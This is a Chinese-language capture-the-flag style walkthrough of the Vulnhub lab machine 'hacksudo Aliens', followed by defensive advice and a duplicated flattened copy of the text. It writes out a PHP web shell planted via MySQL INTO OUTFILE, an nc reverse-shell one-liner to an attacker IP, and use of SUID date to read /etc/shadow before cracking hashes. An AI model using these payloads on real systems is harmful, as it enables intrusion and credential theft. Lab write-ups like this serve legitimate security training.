vulnhub系列6——hacksudo Aliens
字数 1205 2025-08-12 11:34:31

Hacksudo Aliens 靶机渗透测试教学文档

靶机概述

Hacksudo Aliens 是 Vulnhub 上的一个渗透测试靶机,难度中等,主要考察信息收集、Web 应用漏洞利用和 Linux 提权等技术。

环境准备

  • 靶机 IP: 192.168.56.125
  • 攻击机 IP: 192.168.56.105
  • 工具要求: netdiscover, nmap, gobuster, nc, john 等

渗透测试步骤

一、信息收集阶段

  1. 网络发现

    netdiscover -r 192.168.56.0/24
    
  2. 端口扫描与服务识别

    nmap -sV -Pn -sC 192.168.56.125
    
    • 发现开放端口包括 80(HTTP) 和 9000(phpMyAdmin)
  3. Web 目录扫描

    gobuster dir -u http://192.168.56.125 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,cgi
    
    • 发现 /backup 目录,内含 phpMyAdmin 的凭据

二、Web 应用渗透

  1. 获取 phpMyAdmin 凭据

    • /backup 目录下发现账号密码:
      账号: vishal
      密码: hacksudo
      
  2. 检查 MySQL 安全设置

    show global variables like '%secure%';
    
    • 确认 secure_file_priv 未设置限制,允许文件写入
  3. 通过 MySQL 写入 Web Shell

    select '<?php system($_GET[1]);?>' into outfile "/var/www/html/test.php";
    
    • 创建了一个可通过 GET 参数执行系统命令的 PHP 文件
  4. 验证 Web Shell

    http://192.168.56.125/test.php?1=id
    

三、获取初始访问权限

  1. 反弹 Shell

    • 使用 URL 编码后的命令:
    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.56.105 6666 >/tmp/f
    
    • 在攻击机上监听:
    nc -lvnp 6666
    
  2. 升级为交互式 Shell

    python3 -c "import pty;pty.spawn('/bin/bash');"
    

四、权限提升

  1. 枚举系统用户

    cat /etc/passwd
    
    • 发现存在 hacksudo 用户
  2. 查找 SUID 文件

    find / -perm -u=s -type f 2>/dev/null
    
    • 发现 /usr/bin/date 具有 SUID 位且可利用
  3. 利用 date 命令读取敏感文件

    LFILE=/etc/shadow
    /usr/bin/date -f $LFILE
    
    • 成功读取 /etc/shadow 文件内容
  4. 密码破解

    • 将 shadow 文件中的哈希保存到 a.txt
    • 使用 John the Ripper 进行破解:
    john a.txt
    
    • 成功破解出 hacksudo 用户的密码
  5. 切换用户

    su hacksudo
    
    • 输入破解得到的密码
  6. 最终提权

    • 利用 SUID 或其他提权技术获取 root 权限

关键知识点总结

  1. 信息收集

    • 网络发现和端口扫描是渗透测试的基础
    • 目录爆破可能发现敏感备份文件
  2. Web 应用安全

    • phpMyAdmin 默认安装可能使用弱凭据
    • MySQL 的 secure_file_priv 配置不当可能导致 RCE
  3. 权限提升技术

    • SUID 二进制文件滥用是常见的提权方法
    • date 命令的 -f 参数可用于读取任意文件
    • 密码哈希破解是获取用户访问权限的有效手段
  4. 后渗透技巧

    • 反弹 Shell 的多种方法
    • 如何将简单 Shell 升级为完全交互式 Shell

防御建议

  1. MySQL 安全配置

    • 设置 secure_file_priv 为受限目录
    • 避免使用弱密码
  2. 系统加固

    • 定期审计 SUID/SGID 文件
    • 限制敏感文件的读取权限
  3. Web 安全

    • 避免在可访问目录存放备份文件
    • 定期更新 Web 应用组件
  4. 密码策略

    • 强制使用复杂密码
    • 定期更换密码

通过这个靶机的渗透过程,可以全面了解从信息收集到权限提升的完整渗透测试流程。

Hacksudo Aliens 靶机渗透测试教学文档 靶机概述 Hacksudo Aliens 是 Vulnhub 上的一个渗透测试靶机,难度中等,主要考察信息收集、Web 应用漏洞利用和 Linux 提权等技术。 环境准备 靶机 IP: 192.168.56.125 攻击机 IP: 192.168.56.105 工具要求: netdiscover, nmap, gobuster, nc, john 等 渗透测试步骤 一、信息收集阶段 网络发现 端口扫描与服务识别 发现开放端口包括 80(HTTP) 和 9000(phpMyAdmin) Web 目录扫描 发现 /backup 目录,内含 phpMyAdmin 的凭据 二、Web 应用渗透 获取 phpMyAdmin 凭据 在 /backup 目录下发现账号密码: 检查 MySQL 安全设置 确认 secure_file_priv 未设置限制,允许文件写入 通过 MySQL 写入 Web Shell 创建了一个可通过 GET 参数执行系统命令的 PHP 文件 验证 Web Shell 三、获取初始访问权限 反弹 Shell 使用 URL 编码后的命令: 在攻击机上监听: 升级为交互式 Shell 四、权限提升 枚举系统用户 发现存在 hacksudo 用户 查找 SUID 文件 发现 /usr/bin/date 具有 SUID 位且可利用 利用 date 命令读取敏感文件 成功读取 /etc/shadow 文件内容 密码破解 将 shadow 文件中的哈希保存到 a.txt 使用 John the Ripper 进行破解: 成功破解出 hacksudo 用户的密码 切换用户 输入破解得到的密码 最终提权 利用 SUID 或其他提权技术获取 root 权限 关键知识点总结 信息收集 网络发现和端口扫描是渗透测试的基础 目录爆破可能发现敏感备份文件 Web 应用安全 phpMyAdmin 默认安装可能使用弱凭据 MySQL 的 secure_file_priv 配置不当可能导致 RCE 权限提升技术 SUID 二进制文件滥用是常见的提权方法 date 命令的 -f 参数可用于读取任意文件 密码哈希破解是获取用户访问权限的有效手段 后渗透技巧 反弹 Shell 的多种方法 如何将简单 Shell 升级为完全交互式 Shell 防御建议 MySQL 安全配置 设置 secure_file_priv 为受限目录 避免使用弱密码 系统加固 定期审计 SUID/SGID 文件 限制敏感文件的读取权限 Web 安全 避免在可访问目录存放备份文件 定期更新 Web 应用组件 密码策略 强制使用复杂密码 定期更换密码 通过这个靶机的渗透过程,可以全面了解从信息收集到权限提升的完整渗透测试流程。